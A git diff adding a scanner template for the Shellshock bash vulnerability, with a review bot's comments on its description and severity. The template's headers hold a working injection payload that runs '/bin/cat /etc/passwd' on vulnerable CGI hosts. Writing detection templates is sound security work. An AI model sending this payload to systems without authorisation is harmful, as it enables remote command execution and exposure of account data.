diff --git a/cves/CVE-2014-6271.yaml b/cves/CVE-2014-6271.yaml
new file mode 100644
index 0000000000..512efd2dba
--- /dev/null
+++ b/cves/CVE-2014-6271.yaml
@@ -0,0 +1,32 @@
+id: CVE-2014-6271
+
+info:
+ name: Shellshock
+ author: pentest_swissky
+ severity: high
+ description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
+ # reference: https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/"
+ - "{{BaseURL}}/cgi-bin/status"
+ - "{{BaseURL}}/cgi-bin/stats"
+ - "{{BaseURL}}/cgi-bin/test"
+ - "{{BaseURL}}/cgi-bin/status/status.cgi"
+ - "{{BaseURL}}/test.cgi"
+ - "{{BaseURL}}/debug.cgi"
+ headers:
+ Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
+ Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
+ Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ regex:
+ - "root:[x*]:0:0:"
+ part: body
\ No newline at end of file
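Review bot: The `description` line claims coverage of CVE-2014-7169 as well, but all three header values under `headers:` use the same original function-definition form, so a host carrying only the first bash patch would likely come back clean here while still being exposed to the follow-up issue. I would drop `and CVE-2014-7169` from the description so a negative result is not over-read. `severity: high` also understates an unauthenticated remote command execution that NVD scores at the top of its scale; `severity: critical` fits better, assuming the template schema accepts that value. The reference URL sits in a YAML comment and is discarded on parse, so promote it to a real field if the schema has one. Because the `regex` matcher only fires when passwd-style content is returned in the body, scan results will contain account names from the checked host and should be stored and shared with that in mind.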